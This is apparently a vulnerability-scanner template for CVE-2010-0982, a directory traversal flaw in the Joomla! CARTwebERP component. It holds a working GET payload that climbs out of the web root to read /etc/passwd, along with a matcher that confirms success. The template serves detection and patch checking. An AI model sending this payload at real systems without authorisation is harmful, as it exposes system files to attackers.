id: CVE-2010-0982 info: name: Joomla! Component com_cartweberp - Local File Inclusion author: daffainfo severity: high description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/10942 - https://www.cvedetails.com/cve/CVE-2010-0982 - http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/ - http://secunia.com/advisories/37917 remediation: Apply all relevant security patches and product upgrades. classification: cve-id: CVE-2010-0982 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/02/13